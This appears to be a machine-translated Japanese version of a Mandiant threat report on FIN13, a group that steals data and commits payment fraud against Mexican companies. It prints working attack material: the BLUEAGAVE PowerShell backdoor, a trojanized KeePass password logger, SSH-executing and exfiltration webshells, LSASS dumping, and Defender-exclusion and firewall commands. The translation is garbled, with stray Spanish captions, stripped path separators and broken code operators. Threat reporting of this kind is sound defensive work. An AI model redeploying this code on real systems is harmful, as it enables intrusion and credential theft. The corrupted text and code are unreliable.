FIN13: メキシコに焦点を当てたサイバー犯罪者の攻撃者

Financially Motivated Threat Groups with Operational Lifespans > 1 Year news

2017 年以来、Mandiant は FIN13 を追跡してきました。FIN13 は、2016 年にさかのぼる活動の時間枠でメキシコで長期的な侵入を行っている、勤勉で用途の広い金銭目的の攻撃者です。FIN13 の活動には、サイバー犯罪データの現在の傾向とはいくつかの顕著な違いがあります窃盗とランサムウェア恐喝。

その活動は今日まで続いていますが、多くの点で、FIN13 への侵入は、昔からの伝統的な金融サイバー犯罪のタイム カプセルのようなものです。今日蔓延しているひき逃げのランサムウェア グループの代わりに、FIN13 は時間をかけて情報を収集し、不正な送金を行います。ほとんどの FIN13 の侵入では、Cobalt Strike のような攻撃フレームワークに大きく依存するのではなく、長期的な環境に潜むカスタム パッシブ バックドアとツールを多用しています。このブログでは、FIN13 の活動の注目すべき側面について説明し、さらなる調査に値するサイバー犯罪者の地域エコシステムを強調します。

FIN13の目的

2017 年半ば以降、Mandiant は FIN13 に起因する複数の調査に対応してきました。金銭的に動機付けられた他のプレイヤーとは異なり、FIN13 は非常に的を絞ったターゲットを持っています。 Mandiant の 5 年以上にわたる侵入データは、FIN13 がメキシコを拠点とする組織のみを対象として活動しており、特に金融、小売、ホスピタリティ業界の大規模組織を標的にしていることを示しています。公開されている財務データのレビューによると、これらの組織のいくつかは、数百万ドルから数十億ドルの年間収益を上げています (2021 年 12 月 6 日現在、1 米ドル = 21.11 MXN)。

FIN13 は、被害者のネットワークを徹底的にマッピングし、資格情報を取得し、企業文書、技術文書、財務データベース、その他のファイルを盗み、被害者組織からの不正な資金移動を通じて金銭的利益を得るという目標をサポートします。

滞留時間と運用寿命

Mandiant の調査によると、FIN13 の滞留時間の中央値 (サイバー侵入の開始からその識別までの期間として定義) は 913 日または 2.5 年でした。経済的動機を持つアクターの長期在職期間は、多くの要因により異常で重要です。 2021 年の Mandiant M-Trends レポートでは、エンゲージメントの 52% の滞留時間が 30 日未満で、2019 年の 41% から改善されました。「滞留時間が 30 日以下のインシデントの割合が増加した主な要因は2019 年の 14% から 2020 年には 25% に増加した、ランサムウェアに関連する調査の割合の継続的な増加です。」ランサムウェア調査の滞留時間は数日で測定できますが、FIN13 は通常、最もステルスな操作を実行し、可能な限り最高の報酬を得るために環境に何年も存在します。

Mandiant は、Mandiant の Managed Defense および Incident Response チームによる直接の調査を含む、さまざまなソースから脅威アクターの活動を集約します。 Mandiant が追跡している金銭目的の活動の 850 を超えるクラスターのレビューで、FIN13 は、2013 年から 2019 年にかけてカナダで起きた惨劇であるFIN10だけと説得力のある統計を共有しています。複数の侵入を追跡し、1 つの国の組織を標的にしました。

グループの特定されたアクティビティ (「運用期間」) の最も古い日付と最新の日付を考慮すると、データは興味深いものになります。 Mandiant が追跡している金銭目的の脅威グループのほとんどは、活動期間が 1 年未満です。運用寿命が 1 年から 3 年であるのは 10 社のみです。耐用年数が 3 年を超えるものは 4 つです。これら 4 つのうち、5 年以上運用されているのは FIN10 と FIN13 の 2 つだけで、Mandiant はこれをまれだと考えています (図 1)。

Financially Motivated Threat Groups with Operational Lifespans > 1 Year
図 1: 運用期間が 1 年を超える金銭目的の脅威グループ

FIN13 は、大規模で収益性の高いメキシコの組織のネットワークで、かなりの期間、ステルス性を維持できることが証明されています。

Mandiant の標的型攻撃のライフサイクル

標的型攻撃は通常、予測可能な一連のイベントに従います。付録 A では、Mandiant の標的型攻撃のライフサイクルに関する追加情報を提供します。これは、典型的な侵入の主な段階を示しています。すべての攻撃がこのモデルの正確な流れに従うわけではありません。その目的は、攻撃のライフサイクルを視覚的に表現することです。

プレゼンスを設定する

Mandiant の調査によると、FIN13 は主に外部サーバーを悪用して、BLUEAGAVE や SIXPACK などの一般的な Web シェルやカスタム マルウェアを展開し、プレゼンスを確立していたことが明らかになりました。何年にもわたって標的にされてきたエクスプロイトと特定の脆弱性の詳細は、FIN13 の長い滞留時間と相まって証拠が不十分であるため、確認されていません。 2 つの別々の侵入で、初期の証拠は、被害者の WebLogic サーバーに対するエクスプロイトの可能性を示唆し、一般的な Webshell を作成しました。別のケースでは、Apache Tomcat の悪用を示唆する証拠がありました。正確なベクトルの詳細は不明ですが、FIN13 はこれまで、被害者へのゲートウェイとして、外部サーバー上の Web シェルを使用してきました。

FIN13 がJSPRATを使用することで、攻撃者はローカル コマンドの実行、ファイルのアップロード/ダウンロード、および侵入の後の段階で追加のピボットを行うためのプロキシ ネットワーク トラフィックを実現できます。 FIN13 は歴史的に、PHP、C# (ASP.NET)、Java など、さまざまな言語でコーディングされた公開されている webshell を使用してきました。

FIN13 はまた、環境内で最初の存在を確立することにより、ターゲット ホストに BLUEAGAVE PowerShell パッシブ バックドアを広く実装しました。 BLUEAGAVEは HttpListener.NET クラスを使用して、ハイ エフェメラル ポート (65510 ~ 65512) にローカル HTTP サーバーを設定します。バックドアは、ルート URI または設定されたポートへの受信 HTTP 要求をリッスンし、HTTP 要求を解析し、Windows コマンド プロンプト ( cmd.exe) を介して、要求の「kmd」変数内に保存されている URL エンコード データを実行します。このコマンドの出力は、HTTP 応答の本文でオペレーターに返されます。さらに、Mandiant は FIN13 を Linux システム上で確立できるようにする BLUEAGAVE の Perl バージョンを特定しました。 BLUEAGAVE の PowerShell コードの例を次に示します (図 2)。

図 2: BLUEAGAVE コード スニペット

[Reflection.Assembly]::LoadWithPartialName("System.Web") | Out-Null;

function extract($request) {

    $length = $request.contentlength64;

    $buffer = new - object "byte[]" $length;

    [void]$request.inputstream.read($buffer, 0, $length);

    $body = [system.text.encoding]::ascii.getstring($buffer);

    $data = @ {};

    $body.split('&') | % {

        $part = $_.split('=');

        $data.add($part[0], $part[1]);

    };

    return $data;

};

$routes = @ {

    "POST /" = {

        $data = extract $context.Request;

        $decode = [System.Web.HttpUtility]::UrlDecode($data.item('kmd'));

        $Out = cmd.exe  /c $decode 2 > &1 | Out - String;

        return $Out;

    }

};

$url = 'http://*:65510/';

$listener = New - Object System.Net.HttpListener;

$listener.Prefixes.Add($url);

$listener.Start();

while ($listener.IsListening)  {

    $context = $listener.GetContext();

    $requestUrl = $context.Request.Url;

    $response = $context.Response;

    $localPath = $requestUrl.LocalPath;

    $pattern = "{0} {1}"  - f $context.Request.httpmethod, $requestUrl.LocalPath;

    $route = $routes.Get_Item($pattern);

    if ($route  - eq $null)  {

        $response.StatusCode = 404;

    } else {

        $content = &$route;

        $buffer = [System.Text.Encoding]::UTF8.GetBytes($content);

        $response.ContentLength64 = $buffer.Length;

        $response.OutputStream.Write($buffer, 0, $buffer.Length);

    };

    $response.Close();

    $responseStatus = $response.StatusCode;

}

Mandiant は、アクティブ ビーコンをコマンド アンド コントロール サーバーに送信せずに被害者の環境へのアクセスを提供するマルウェアとしてパッシブ バックドアを分類します。パッシブ バックドアには、特定のプロトコルを使用して着信接続を受け入れたりリッスンしたりする Web シェルやカスタム マルウェアが含まれる場合があります。 FIN13 が BEACON のような一般的に使用されるアクティブなバックドアではなく、パッシブなバックドアを使用していることは、攻撃者がステルスと長期にわたる持続的な侵入を望んでいることを示しています。 FIN13 はまた、被害者のネットワークに関する積極的な知識を維持しているため、最初の基点からターゲット環境に複雑なピボットを効果的に作成することができます。最近の侵入の際、Mandiant は、FIN13 が最初の基盤を利用して複数の Webshell を連鎖させ、環境内の BLUEAGAVE に感染したホストにトラフィックを送信していることを確認しました。以下の図 3 は、ログに記録された HTTP 要求の例です。これは、FIN13 が最初のベースから複数の webshell を連鎖させていることを示しています。

図 3: Webshell encadenando solicitudes HTTP

GET /JavaService/shell/exec?cmd=curl%20-
v%20http://10.1.1.1:80/shell2/cmd.jsp%22cmd=whoami%22

権限昇格

FIN13 は主に一般的な権限昇格手法を使用しますが、攻撃者は、さまざまな被害者ネットワークにさらされたときに柔軟に適応できるように見えます。 FIN13 は、Windows Sysinternal のProcDumpなどの公開ユーティリティに依存して、LSASS システム プロセスのメモリ ダンプを取得し、その後、Mimikatz を使用してダンプを分析し、資格情報を抽出しました。以下は、FIN13 が LSASS プロセス メモリをダンプするために使用するホスト コマンドの例です (図 4)。

図 4: LSASS メモリ バック コマンド

C:WindowsTemppr64.exe -accepteula -ma lsass.exe C:WindowsTempls.dmp

Mandiant はまた、FIN13 が正規の Windows certutil ユーティリティを使用し、場合によっては検出回避のために ProcDump などの難読化されたユーティリティのコピーを実行していることも確認しています。あるハッキングでは、FIN13 が certutil を使用して、base64 でエンコードされたバージョンのLATCHKEYカスタム ドロッパーをデコードしました。 LATCHKEY は、コンパイル済みの PowerShell to EXE (PS2EXE) ドロッパーであり、ディスク上の LSASS システム プロセスのミニダンプを生成するPowerSploit Out-Minidump 関数を base64 でデコードして実行します。

FIN13 では、さらに独自の権限昇格手法もいくつか使用されています。たとえば、最近の侵入の際、Mandiant は FIN13 が正規の KeePass バイナリをトロイの木馬化されたバージョンに置き換え、新しく入力されたパスワードをローカルのテキスト ファイルに記録したことを観察しました。これにより、FIN13 はその使命を推進するために、多数のアプリケーションの資格情報をターゲットにして収集することができました。以下は、FIN13 によってクライアント環境に実装された KeePass のトロイの木馬化されたバージョンからのコードの抜粋です (図 5)。

図 5: Fragmento de código troyano de KeePass

private void OnBtnOK(object sender, EventArgs e)

{

using (StreamWriter streamWriter = File.AppendText("C:windowstempfile.txt"))

{

this.m_tbPassword.EnableProtection(false);

streamWriter.WriteLine(this.m_cmbKeyFile.Text + ":" + this.m_tbPassword.Text);

this.m_tbPassword.EnableProtection(true);

}

if (!this.CreateCompositeKey())

{

base.DialogResult = DialogResult.None;

}

内部認識

FIN13 は、ネイティブのオペレーティング システム バイナリ、スクリプト、サードパーティ ツール、およびカスタム マルウェアを活用して、侵害された環境内で内部偵察を実行することに特に長けています。このアクターは、さまざまなテクニックを駆使して、最終的な目標をサポートする背景情報をすばやく収集しているようです。

Mandiant は、FIN13 が一般的な Windows コマンドを使用して whoami などの情報を収集し、現在ログインしているユーザーのグループと権限の詳細を表示することを確認しました。ネットワーク偵察のために、ping、nslookup、ipconfig、tracert、netstat、および net range コマンドを利用することが観察されています。ローカル ホスト情報を収集するために、脅威アクターは、systeminfo、fsutil fsinfo、attrib、および dir コマンドの広範な使用を使用しました。

FIN13 は、そのプロセスを自動化するために、これらの偵察作業の多くをスクリプトに組み込みました。たとえば、pi.bat を使用してファイル内の IP アドレスのリストを反復処理し、ping コマンドを実行して、出力をファイルに書き込みました (図 6)。同様のスクリプトで dnscmd を使用して、ホストの DNS ゾーンをファイルにエクスポートしました。 .

図 6: contenido del archivo de salida pi.bat

@echo off

for /f "tokens=*" %%a in (C:windowstempip.t) do (echo trying %%a: >>
C:windowstemplog4.txt ping -n 1 %%a >> C:windowstemplog4.txt 2>&1)

FIN13 は、 NMAPなどのサードパーティ製ツールを活用して、偵察操作をサポートしています。 FIN13 の 3 つの調査で、攻撃者はGetUserSPNS.vbsスクリプトの亜種を使用して、サービス プリンシパル名に関連付けられたユーザー アカウントを特定しました。このユーザー アカウントは、ユーザー パスワードをクラックするための「Kerberoasting」として知られる攻撃の標的となり得るものでした。また、PowerShell を使用して追加の DNS データを取得し、ファイルにエクスポートします (図 7)。同様の PowerShell コードが、coderoad[.]ru の 2018 年 6 月の投稿に記載されています。

図 7: PowerShell による DNS の確認

$results = Get - DnsServerZone | % {

$zone = $_.zonename

Get - DnsServerResourceRecord $zone | select @ {

n = 'ZoneName';

e = {

$zone

}

}, HostName, RecordType, @ {

n = 'RecordData';

e = {

if ($_.RecordData.IPv4Address.IPAddressToString) {

$_.RecordData.IPv4Address.IPAddressToString

} else {

$_.RecordData.NameServer.ToUpper()

}

}

}

}

$results | Export-Csv -NoTypeInformation c:windowstempaddcat.csv -Append

別のケースでは、FIN13 は PowerShell スクリプトを実行して、過去 7 日間のホストからログイン イベントを抽出しました。情報を収集し、FIN13 をターゲット システムの通常の運用に統合できるようにするために使用された可能性があります。さらに、このスクリプトは、対応するイベント 7002 がないログイン ユーザー、イベント 7001 を識別するのに役立ちます。これは、LSASS ダンプがユーザー資格情報を取得できることを示唆しています (図 8)。同様の PowerShell コードが、codetwo[.]com の 2018 年 7 月の投稿に記載されています。

図 8: PowerShell の追加イベントの初期設定

"C:Windowssystem32cmd.exe" / c "echo $hostnm = hostname;

$logs = get-eventlog system -ComputerName $hostnm -source Microsoft-Windows-Winlogon -After (Get-Date).AddDays(-7);

$res = @();

ForEach ($log in $logs){

if($log.instanceid -eq 7001) {$type = "Logon"}

Elseif ($log.instanceid -eq 7002){$type="Logoff"}

Else {Continue} $res += New-Object PSObject -Property @{Time = $log.TimeWritten; User = (New-Object System.Security.Principal.SecurityIdentifier $Log.ReplacementStrings[1]).Translate([System.Security.Principal.NTAccount])}};

$res | Out-File C:windowstemplogs1.txt"

さらに、FIN13 は企業のインフラストラクチャを利用して偵察活動を行っています。調査中、FIN13 はターゲットの Symantec Altiris Console (ハードウェアとソフトウェアの管理プラットフォーム) にアクセスし、ホストとネットワークの情報を取得するために、インターフェース上の既存の Run Script タスクを繰り返し変更しました。別の調査では、FIN13 は侵害された LanDesk アカウントを使用してコマンドを実行し、環境からホスト、ネットワーク、およびデータベース情報を返しました。

FIN13 は、公開されているツールだけでなく、さまざまなカスタム マルウェア ファミリを使用して内部偵察を支援しています。 FIN13 は 3 つの調査で、Java ベースのポート スキャナーである PORTHOLE を使用してネットワーク調査を実施しました。 PORTHOLEは、多くの IP アドレスとポートに対して複数のソケット接続を試みることができます。また、マルチスレッドであるため、重複する可能性のある複数の接続を使用して、この操作を迅速に実行できます。マルウェアは、最初の引数として、アドレスまたはファイル名にワイルドカードを含む IP アドレスを受け入れます。 2 番目の引数は各 IP をスキャンする開始ポート範囲で、3 番目は終了ポート範囲です。

CLOSEWATCHは、特定のポートを介してローカル ホスト上のリスナーと通信し、被害者のオペレーティング システムに任意のファイルを書き込み、被害者のホストで任意のコマンドを実行し、プロキシを無効にし、リクエストを発行する JSP Web シェルです。リモートホストの。適切な HTTP URL パラメータが指定されている場合、CLOSEWATCH はポート 16998 でローカル ホストへのソケット接続を作成できます。この接続では、チャンク転送エンコーディングを使用した HTTP のような通信を使用してデータを送受信できます。 range パラメータが指定されている場合、CLOSEWATCH はカスタム パラメータを使用して IP アドレスとポートの範囲をスキャンできます。このマルウェアは、FIN13 の最初の調査の 1 つで確認されました。サンプルは最近パブリック リポジトリに出現しましたが、このマルウェアは最近の調査では確認されていません。単なる偵察ツールではありませんが、CLOSEWATCH の範囲パラメーターは FIN13 に別のスキャン機能を提供します。

FIN13 は Microsoft の osql ユーティリティを実行することが知られていますが、SQL 調査のために、 Mandiantが SPINOFF として追跡する別の JSP Webshell も利用しています。 SPINOFF は、特定のデータベースに対して任意の SQL クエリを実行し、結果をファイルにダウンロードできます。 CLOSEWATCH と同様に、このマルウェアは初期の調査で蔓延していました。

Mandiant が DRAWSTRING として追跡するダウンローダには、いくつかの内部偵察機能があります。主に FIN13 に任意のファイルをダウンロードして実行する機能を与える一方で、DRAWSTRING は systeminfo.exe も実行し、その情報をコマンド アンド コントロール (C2) サーバーにアップロードします。マルウェアは起動時に、サービス、.lnk ファイル、または SoftwareMicrosoftWindowsCurrentVersionRun レジストリ キーの更新のいずれかの方法で永続性を作成します。マルウェアは多数のウイルス対策プロセスをチェックし、見つかった場合は永続化方法を変更します。

次に、マルウェアは次の 2 つのコマンド (図 9 と図 10) を実行します。ここで、%s はプログラムの名前に置き換えられます。

図 9: Windows Defender 構成を変更する PowerShell コマンド

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"

この Add-MpPreference コマンドは、Windows Defender の設定を変更し、リアルタイム スキャンとスケジュール スキャンから除外するファイル パスを指定します。

図 10: コマンド netsh para perperir comunicaciones DRAWSTRING

Netsh advfirewall firewall add rule name="Software Update" profile=domain,private,public protocol=any enable=yes DIR=Out program="%s" Action=Allow

このコマンドは、DRAWSTRING 発信通信を許可する Windows ファイアウォールに新しい規則を追加します。

このマルウェアは、systeminfo.exe を実行してシステム情報を収集し、ユーザー名、コンピューター名、システム パッチ情報、プログラム ファイル ディレクトリ リスト、およびアーキテクチャが暗号化され、base64 でエンコードされます。次に、DRAWSTRING は、キャプチャしたシステム データを使用して、ポート 443 経由で HTTP POST 要求を行います。この通信はポート 443 を使用しますが、データは TLS/SSL 経由ではなく、暗号化されません。マルウェアは C2 への接続を 10 回試行し、各ラウンドの間に 10 秒間スリープします。応答は復号化され、保存され、実行されます。

呼び出しの例を図 11 に示します。Mandiant は、FIN13 が DRAWSTRING と GOTBOT2 C2 に同じ IP アドレスを使用していることを確認しました。

図 11: Ejemplo de solicitud DRAWSTRING POST

POST /cpl/api.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

host: <Ipv4 address>

Content-Length: 8094

Q=<BASE64 Encrypted Data>

横移動

このグループは、多くの場合、 Windows Management Instrumentation (WMI) を利用してコマンドをリモートで実行し、横方向に移動します。つまり、ネイティブの wmic コマンド、公開されているバージョンのInvoke-WMIExecスクリプト、またはWMIEXECを使用します。以下は、FIN13 で使用される WMIC コマンドの例です (図 12)。

図 12: コマンドの例 WMIC

wmic /node:"192.168.133.61" /user:"<victim><admin account>" /password:<admin password> process call create "powershell -noprofile -ExecutionPolicy Bypass -encodedCommand <Base64>"

FIN13 が wmiexec.vbs を使用したのと同じ調査で、Mandiant は、攻撃者が BUSTEDPIPE と呼ばれるカスタム JSP Webshellトンネラーを使用して、Web リクエストを介したラテラル ムーブメントを容易にしていることも確認しました。

Mandiant はまた、FIN13 がマネージド ディフェンス クライアントでInvoke-SMBExec PowerShell ユーティリティなどの Invoke-WMIExec に類似したユーティリティを使用していることも確認しています。以下は、FIN13 で使用される Invoke-SMBExec コマンドの例です (図 13)。

図 13: Commando Invoke-SMBExec de PowerShell

powershell -ExecutionPolicy Bypass -command "& { . C:windowstempinsm.ps1; Invoke-SMBExec -Username <user> -Command 'cmd /c whoami ' -Domain CB -Hash REDACTED:REDACTED -Target <IP address> }"

NIGHTJARは、複数の調査で観察された Java ローダーであり、 ここで見つかったコードに基づいているようです。 NIGHTJAR は、実行時にコマンド ラインで指定されたソケットをリッスンし、ファイルをダウンロードしてディスクに保存します。このマルウェアには持続性メカニズムが含まれておらず、C:WindowsTemp または C:inetpubwwwroot ディレクトリで確認されています。コマンド ライン構文の 2 つのバージョンが確認されています (図 14)。

図 14: NIGHTJAR コマンド ライン構文

[+] Usage: Host Port /file/to/save

図 15: NIGHTJAR セカンダリ コマンド ライン構文

[+] Usage: Interface[localhost] Port /rout/to/save

プラットフォーム間を横方向に移動するために、FIN13 は BLUEAGAVE Webshell と、特定のユーザー名とパスワードを使用して SSH 経由で Linux システム間でコマンドをリモートで実行するために使用された他の 2 つの小さな PHP Webshell を使用しました。これらの Webshell の 1 つのスニペットを以下の図 16 に示します。

図 16: シェル Web ejecutivo SSH

<?php

error_reporting(0);

set_time_limit(0);

 

include('Net/SSH2.php');

 

$ip = file_get_contents('/dev/shm/22.txt');

$command = $_REQUEST['command'];

if($command=='')

{

}

else

{

foreach(preg_split("/((r?n)|(rn?))/", $ip) as $ips){

$ssh = new Net_SSH2($ips);

if ($ssh->login('<REDACTED>', '<REDACTED>')) {

echo "<pre>", $ips, "</pre><br>";

echo "<pre>", $ssh->exec($command), "</pre> <br>";

}

else

{

echo "Login Failed on $ips <br> n";

}

}

print "El script ha finalizado";

}

?>

存在感を維持する

最初の FIN13 の侵入では、持続性のために複数の汎用 Web シェルが関与していましたが、FIN13 は何年にもわたって、環境内での持続性に使用するカスタムおよび公開されている両方のマルウェア ファミリのポートフォリオを開発してきました。

複数のハッキングで、FIN13 はSIXPACKSWEARJARを実装しました。 SIXPACK は、トンネラーとして機能する C# で記述された ASPX Webshell です。 SIXPACK は、接続先のリモート ホストと TCP ポート、タイムアウト値、指定されたホストへの接続後に送信する Base64 エンコード データを含む HTTP フォーム データを受け入れます。 SIXPACK は応答データを読み取り、それを元のクライアントに返します。 SWEARJAR は、シェル コマンドを実行できる Java ベースのクロスプラットフォーム バックドアです。

あるケースでは、FIN13 はMAILSLOTと呼ばれるバックドアを実装しました。このバックドアは SMTP/POP over SSL を介して通信し、攻撃者がコマンド アンド コントロールのために制御する設定済みの電子メール アカウントとの間で電子メールを送受信します。 MAILSLOT により、FIN13 は、攻撃者が C2 に電子メール通信を使用するまれなケースになります。

また、クライアント モードまたはサーバー モードで動作し、TCP を介してカスタム バイナリ プロトコルと通信できる C/C++ で記述されたトンネラーである HOTLANE と呼ばれるカスタム Mandiant ユーティリティも使用しています。

カスタム マルウェアに加えて、FIN13 はGOBOT2バックドアやTINYSHELLなどの公開されているマルウェアを使用しています。

攻撃者が使用する公に入手可能な単一のユーティリティはPHPSPY ベースの PHP Webshell であり、 Mandiantによって SHELLSWEEP として追跡され、クレジット カード情報を取得する機能が含まれていました。次の図には、PHP Webshell のスニペットが含まれています (図 17)。

 

図 17: 公開されている PHP Webshell PCI 関連のコード スニペット

$level = 1;

if (isset($_GET['level'])) $level = $_GET['level'];

$firmas = array("Estandar eval(base64_decode())" = > "/evals*(s*base64_decode(s*/", "eval(gzinflate(base64_decode()))" = > "/evals*(gzinflates*(s*base64_decodes*(s*/", "D4NB4R WAS HERE" = > "/D4NB4R WAS HERE/", "md5(Safety)" = > "/6472ce41c26babff27b4c28028093d77/", "md5(backdoor1)" = > "/f32e7903a13ff43da2ef1baf36adeca9/", "WSO 2.1 (Web Shell by oRb)" = > "/10b27b168be0f7e90496dbc5fcfa63fc/", "WSO 2.1 (Web Shell by oRb) 2" = > "/Web Shell by oRb/", "milw0rm.com" = > "/milw0rm.com/", "exploit-db.com" = > "/exploit-db.com/", "FilesMan" = > "/preg_replaces*(s*("|')/.*/e("|')/", "CMD" = > '/(system|exec|passthru)(s*$_GET[([^wd]|"|')*cmd([^wd]|"|')*]s*)/', "CC's dump"=>"/num_tarjeta,codigo_sec,fecha_expira/i","root 12345"=>"/'root','12345'/i",);$level2=array("Pasarela (VPCPaymentConnection)"=>"/VPCPaymentConnection/","setSecureSecret(__GROUP__)"=>"/setSecureSecrets*(s*(.+?)s*)/","__GROUP____PARSE_ARGS__"=>"/((ifx_connect|oci_connect|mysql_connect|pg_connect|mssql_connect|odbc_connect)s*(s*.+?s*)s*;)/i");if(intval($level)>1){$firmas=array_merge($firmas,$level2);}$level3=array("CC's (__GROUP__)" = > "/[^w](cc_?num(ber)?|credit_?card|cod_?sec|cvv|num_?cad|num_?exp|tarjeta|numero_?tarjeta|vence_?mes|vence_?ano|c_seg|exp_code?)[^w]/i", "Visa CC's (__GROUP__)"=>"/[^dw]((?:4[0-9]{12}(?:[0-9]{3})?)[^dw]/","MasterCard CC's (__GROUP__)" = > "/[^dw](5[1-5][0-9]{14})[^dw]/", "American Express CC's (__GROUP__)" = > "/([^dw]3[47][0-9]{13}[^dw])/");

バックドアを永続的に実行するために、FIN13 は C:WINDOWShosts.exe にあるファイルを実行するように構成された HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionRunhosts などの Windows レジストリ実行キーを使用しました。彼らはまた、acrotryr や AppServicesr などの名前のスケジュールされたタスクを作成し、C:Windows ディレクトリで同じ名前のバイナリを実行しました。

ミッションを完了する

多くの組織がランサムウェアに殺到していますが、FIN13 は標的型データの窃盗を通じて侵入を収益化し、不正なトランザクションを可能にします。 FIN13 は、LSASS プロセス ダンプやレジストリ キーなど、一般的に標的にされたデータを盗み出しましたが、最終的には、財務目標を達成するために強力なユーザーを標的にしました。ある侵入で、FIN13 は被害者の財務システムのすべての主要なユーザーと役割を具体的にリストしました。その後、FIN13 は、POS や ATM ネットワークなど、ネットワークの機密性の高い部分に移動し、さまざまな非常に特殊なデータを盗み出す可能性がありました。

被害者の 1 人では、POS システムでの送金を容易にするために一般的に使用されているソフトウェアである Verifone に関連するファイルが FIN13 によって抽出されました。少なくとも 1 つのケースでは、FIN13 は POS システムのベース フォルダ全体を盗み出しました。これには、ファイルの依存関係、レシートの印刷に使用される画像、効果音に使用される .wav ファイルが含まれていました。別の被害者では、FIN13 が被害者の ATM ソフトウェアの依存ファイルを同様に盗みました。金融取引のために重要なシステムから盗まれた情報は、不正行為の可能性のある経路を明らかにするために使用される可能性があります。

また、FIN13 はデータベースとやり取りして、財務上の機密情報を収集しました。被害者のデータベースで、FIN13 は抽出のために次のテーブルの内容を取得しました。

  • 「claves_retiro」(英訳「引き出しキー」)
  • 「codigos_retiro_sin_tarjeta」(英訳「キーレスカード出金コード」)
  • 「retirosefectivo」(英訳「現金引き出し」)

宝物を手にした FIN13 は、Windows certutil ユーティリティを使用して入力ファイルから Base64 でエンコードされた偽の証明書を生成することで、保存されているデータを偽装しました。証明書にはアーカイブ ファイルの内容が含まれていました (図 18)。これは、次のような通常の証明書の開始ステートメントと終了ステートメントを使用して、抽出用に準備されています。

図 18: アーカイブのデータ、etapas、証明書

-----BEGIN CERTIFICATE-----

UmFyIRoHAM+QcwAADQAAAAAAAABtB3TAkEgADWsDAV5qvgMCpojeh0SF+EodMyMA

IAAAAFVzZXJzXGFkbV9zcWxcQXBwRGF0YVxSb2FtaW5nXGwuZG1wALDbslQiIdVV

[truncated]

54Mt/3107vXRoa10YPmXffXCPQ+LF4vq3vhdKn+Z+tdaYeD/IgueHaxaff6yZMmT

JkyZMmTepv/ExD17AEAHAA==

-----END CERTIFICATE-----

その後、FIN13 は、以前に環境に実装された Web シェルを介して、または単純な JSP ツール (図 19) を使用して、次のような Web アクセス可能なディレクトリにデータを抽出しました。

図 19: JSP を使用したロボット データの例

<%@ page buffer="none" %>

<%@page import="java.io.*"%>

<%String down="I:[attacker created dir][attacker created archive]";

if(down!=null){

response.setContentType("APPLICATION/OCTET-STREAM");

response.setHeader("Content-Disposition","attachment; filename="" + down + """);

FileInputStream fileInputStream=new FileInputStream(down);

int i;

while ((i=fileInputStream.read()) != -1) {

out.write(i);}fileInputStream.close();}%>

FIN13 は、不正な取引を助長する可能性のある特定のデータを標的にしていましたが、FIN13 が盗んだ情報をどのように利用したかを直接目撃できるとは限りませんでした。被害者の 1 人から、GASCAN と呼ばれるツールを取得することができました。

GASCAN は Java ベースのマルウェアで、POS データを処理し、特別に細工されたメッセージをコマンド ラインで指定されたリモート サーバーに送信します。送信されたデータには、 2 つの異なる ISO 8583 メッセージ タイプのいずれかに対応する値が含まれており、ISO 8583 詐欺トランザクションの構築に使用できます。最初のメッセージ タイプ 0100 は、承認メッセージに対応するデータを示し、存在するかどうかを判断するために使用されます。特定の口座で利用可能な資金。最初のメッセージを受信した後、C2 サーバーは文字列「Approved」を含むバッファーを返します。 2 番目のタイプのメッセージである 0200 には、財務要求メッセージに使用されるデータが含まれており、特定のアカウントに請求を転記するために使用されます。 2 番目のメッセージ構造には、「金額」と呼ばれるフィールドが含まれます。 「金額」の値は、2000 から 3000 の間でランダムに生成された数値を返す内部関数を使用して計算され、2 番目のメッセージで送信されたトランザクションの金額として使用されます。送信された情報に基づいて、指定されたリモート サーバーが、不正なトランザクション用の ISO 8583 メッセージのフォーマットと送信を担当している可能性があります。

GASCAN のサンプルは、被害者の環境と、組織が使用する POS システムから期待されるデータに合わせて調整されています。同じ被害者が、短期間に 1,000 件を超える不正取引を警告され、合計で数百万ペソまたは数十万米ドルに上ります。

パノラマ

サイバー犯罪活動の複雑なネットワーク、仮想通貨に転向する伝統的な組織犯罪、北朝鮮からの攻撃的な攻撃中国のスパイ活動ランサムウェアのパンデミックなど、ラテンアメリカのサイバースペースは、今後数年間、さらなる調査の対象となるでしょう。今年初めにProofpointESETによって指摘されました。

特に、ランサムウェアはサイバー犯罪者の時代精神を捉えていますが、Mandiant は、このブログの時点で、FIN13 が侵入にランサムウェアを展開していることを確認していません。 FIN13 は、より伝統的で金銭目的のサイバー犯罪を標的にしており、その運用全体で Linux および Windows システムを標的にしています。ラテンアメリカの犯罪者も、主にランサムウェアの実行に移行するのか、それとも詐欺を追求し続けるのかはまだわかりません.

ラテンアメリカのセキュリティ チームとエグゼクティブは、これらの脅威を認識し、現在の体制を評価し、それに応じて適応する必要があります。 Mandiant は、これらの組織がより広範な業界と協力してこれらの脅威を軽減し続けることを奨励しています。 Mandiant のメキシコおよび世界中のインシデント対応、戦略的準備、および技術保証コンサルタントのチームは、これらの取り組みを支援する準備ができています。

 

詳しくは

無料の Mandiant Advantage Threat Intelligence サブスクリプションにサインアップして、FIN13 と、DNS TXT レコードを介してコマンドを受信する FIN13 で使用されるバックドアである SWEARJAR の詳細を確認してください。

すでに登録? FIN13 レポート、 SWEARJARマルウェア プロファイルその他のバックドア レポートをお読みください。

侵害の兆候

ファミリア・デ・マルウェア

MD5

SHA1

SHA256

クローズウォッチ

1c871dba90faeef9cb637046be04f291

ea71757fcd45425353d4c432f8fcef4451cd9b22

e9e25584475ebf08957886725ebc99a2b85af7a992b6c6ae352c94e8d9c79101

巾着

f774a1159ec25324c3686431aeb9a038

1f53342aaa71be3d25e6c28dd36f949b7b504a28

2d2a67fcce58c73e96358161e48e8b09fa2b171c837d7539c22461e46c47656c

巾着

9a6993ee1af31dc386be4583dd866bfc

67c7469aaaf352705ec66c3bb73366c77cf3577c

77b4da7f513b7bf555e34fd6450a43e869ec9aa037c0e274ace81ae3d9cda94f

呼び出し-SMBExec

9e484e32505758a6d991c33652ad1b14

16a71f2ffc1bb24b2862295072831b698ae38f3a

674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd

呼び出し-WMIExec

081beadd4dc5f070c087df82df22179c

ca0cc3d624be7a2933413e8d7440374b25eae1bd

b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7

GOBOT2

384fea272567d924c2a256ce9e91d949

0ae8dd21ce229884519cb8e5ed6b2753a18a7ead

